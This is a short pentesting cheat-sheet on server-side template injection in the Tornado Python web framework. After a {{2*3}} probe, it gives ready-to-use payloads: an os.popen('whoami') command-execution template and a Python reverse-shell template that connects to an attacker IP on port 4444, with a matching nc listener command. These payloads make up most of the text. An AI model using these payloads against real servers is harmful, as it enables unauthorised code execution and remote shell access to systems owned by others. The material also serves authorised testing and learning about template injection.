Tornado Pentesting

Last modified: Sun May 28 2023 00:00:00 GMT+0000 (Coordinated Universal Time)

Web

Tornado is a Python web server and web application framework.

Server-Side Template Injection (SSTI)

We can execute arbitrary Python script using the server-site template injection.
First check if the script will be executed as below.

<title>Website by {{ 2*3 }}</title>
<span>{{ 2*3 }}</span>

# URL parameters
https://example.com/?q={{2*3}}

If the website shows 6 instead of 2*3, we can execute arbitrary code.
Try following payloads.

{% import os %}{{ os.popen("whoami").read() }}

# Reverse shell. Replace "10.0.0.1" with your own ip 
# It requires a listener like `nc -lvnp 4444` in local terminal.
{% import socket,subprocess,os %}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]) }}